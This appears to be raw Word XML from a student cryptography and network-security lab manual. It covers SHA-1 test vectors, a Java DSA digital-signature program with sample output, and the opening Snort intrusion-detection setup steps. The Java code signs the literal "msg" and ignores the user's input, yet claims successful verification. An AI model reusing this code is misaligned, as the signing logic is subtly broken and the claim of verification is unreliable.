          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788D0CA8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ToString=SHA1 Message Digest from SUN, &lt;initialized&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">SHA1("")=DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>SHA1("abc")=A9993E364706816ABA3E25717850C26C9CD0D89D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562B7693" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>SHA1("abcdefghijklmnopqrstuvwxyz")=32D10C7B8CF96570CA04CE37F2A19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="67"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>D84240D3A89</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C70D4D2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA159F2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C049B11" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="255"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77BDA248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41078C75" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="36" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="783" w:firstLine="719"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Thus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Secure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Hash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(SHA-1)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 verified successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A43859" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00A16F47">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="178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1291FD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Standard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7760B7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="171"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61C62319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093D4F07" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36"/>
        <w:ind w:left="1080"/>
      </w:pP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Signature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Standard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100D63F6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC0927B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="213"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C068C7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ALGORITHM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8069F2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39" w:line="322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KeyPairGenerator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4B6D1F9D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20" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Initialize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KeyPairGenerator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34629471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18" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Generate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KeyPairGenerator.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4E574B0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18" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359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from 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pair.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BA6246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18" w:lineRule="exact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signature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5658E534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20" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Initialize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Signature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2B5DEA90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20" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359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Signature </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFC54A7" w14:textId="77777777" w:rsidR="00A16F47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321" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Calculate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Signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0748694E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="39"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FFC989E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>PROGRAM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1877E9F3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="272"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both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java.security.KeyPair;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B56CF31" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="230"/>
        <w:ind w:left="360" w:right="6254"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>java.security.KeyPairGenerator; import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>java.security.PrivateKey;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>java.security.Signature;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C576251" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both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java.util.Scanner;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F639D43" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="86"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B94D307" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pP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CreatingDigitalSignature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27709C85" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="569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7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>args[])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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6316027" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F4276BC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="778" w:right="5338"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Scanner sc = new Scanner(System.in); System.out.println("Enter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text");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>String msg = sc.nextLine();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D1D779" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64441A3E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="482" w:lineRule="auto"/>
        <w:ind w:left="778" w:right="2691"/>
      </w:pPr>
      <w:r>
        <w:t>KeyPairGenerator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>keyPairGen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KeyPairGenerator.getInstance("DSA"); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>keyPairGen.initialize(2048);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AF9BD6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="778" w:right="4861"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>KeyPair pair =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">keyPairGen.generateKeyPair(); </w:t>
      </w:r>
      <w:r>
        <w:t>PrivateKey privKey = pair.getPrivate();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FA1605" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="778" w:right="1100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Signature sign =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">Signature.getInstance("SHA256withDSA"); sign.initSign(privKey); </w:t>
      </w:r>
      <w:r>
        <w:t>byte[] bytes = "msg".getBytes(); sign.update(bytes);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2B76E9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="275"/>
        <w:ind w:left="778"/>
      </w:pPr>
      <w:r>
        <w:t>byte[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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sign.sign();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717DB237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2AE5A2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="74"/>
        <w:ind w:left="778"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>System.out.println("Digital</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13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text:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"+new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>String(signature,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>"UTF8"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB86938" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="569"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A95C71" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="242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634C1F62" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A5CE59D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E1B145" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="655A7A02" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B0785AD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA02DB7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E06A696" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6031B1EA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D834DB9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="94"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6149ABBD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>OUTPUT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624E6379" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="33"/>
        <w:ind w:left="360" w:right="8306"/>
      </w:pPr>
      <w:r>
        <w:t>Enter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20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Hi how are you</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744B15C9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Digital</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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text:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>0=@gRD???-?.????</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>/yGL?i??a!?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8FB162" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4694F60F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB08838" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E66C654" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D35343" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="312E2DDF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53A29981" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FE7CD5F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ABE7162" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1710751A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="211"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D691845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73D50740" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="34"/>
        <w:ind w:left="360" w:right="426" w:firstLine="719"/>
      </w:pPr>
      <w:r>
        <w:t>Thus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Signature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11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Scheme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has been verified successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E840993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7038D3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/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Demonstrate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intrusion detection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(IDS) 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s/w.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E40CA1E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1696EE71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37461D2C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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Intrusion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(IDS)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Snort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D9FCB3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C01F18" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05759AD0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
        </w:rPr>
        <w:t>STEPS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CONFIGURING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INTRUSION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DETECTION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC0CECB" w14:textId="77777777" w:rsidR="00A16F47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274"/>
        <w:ind w:left="640" w:hanging="280"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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Snort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Snort.org</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>website.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hyperlink r:id="rId12">
        <w:r>
          <w:rPr>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.snort.org/snort-</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> downloads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECA022E" w14:textId="77777777" w:rsidR="00A16F47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41" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="936" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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Rules(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://</w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r>
          <w:rPr>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.snort.org/snort-rules</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>).</w:t>
        </w:r>
      </w:hyperlink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register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rules.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(You should download these often)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C2A702" w14:textId="77777777" w:rsidR="00A16F47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226" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="1087" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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.exe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snort.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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snort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sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>C:\Snort</w:t>
      </w:r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folder.It</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>is important to have WinPcap (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://</w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r>
          <w:rPr>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.winpcap.org/install/</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148DBACA" w14:textId="77777777" w:rsidR="00A16F47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34"/>
        <w:ind w:left="640" w:hanging="280"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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WinRAR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.gz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C43A0AA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="640"/>
        </w:tabs>
        <w:spacing w:before="53"/>
        <w:ind w:left="640" w:hanging="280"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>all files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“rules”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39"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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paste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rules </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>into</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697765F5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="43"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>“C:\Snort\rules”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248F5DCB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
